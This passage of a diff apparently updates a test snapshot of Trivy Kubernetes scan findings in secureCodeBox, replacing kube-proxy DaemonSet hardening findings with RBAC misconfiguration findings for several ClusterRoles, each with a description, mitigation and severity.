"https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'admin' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", + ], + }, + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5111", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], "severity": "HIGH", @@ -169377,86 +170051,86 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.allowPrivilegeEscalation' to false)", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-proxy' of DaemonSet 'kube-proxy' should add 'ALL' to 'securityContext.capabilities.drop')", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(DaemonSet 'kube-proxy' should not set 'spec.template.spec.hostNetwork' to true)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], "severity": "HIGH", @@ -169464,173 +170138,173 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.cpu')", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsNonRoot' to true)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.readOnlyRootFilesystem' to true)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", ], }, "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.cpu')", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.memory')", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV017", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv017", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, "category": "Misconfiguration", - "description": "Privileged containers share namespaces with the host system and do not offer any security. They should be used exclusively for system containers that require high privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Change 'containers[].securityContext.privileged' to 'false'.", - "name": "Privileged container(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.privileged' to false)", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv017", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], "severity": "HIGH", @@ -169638,176 +170312,176 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.memory')", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsUser' > 10000)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", ], }, "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsGroup' > 10000)", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", ], }, "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(DaemonSet 'kube-proxy' should not set 'spec.template.volumes.hostPath')", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", + "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV045", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv045", ], }, "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": 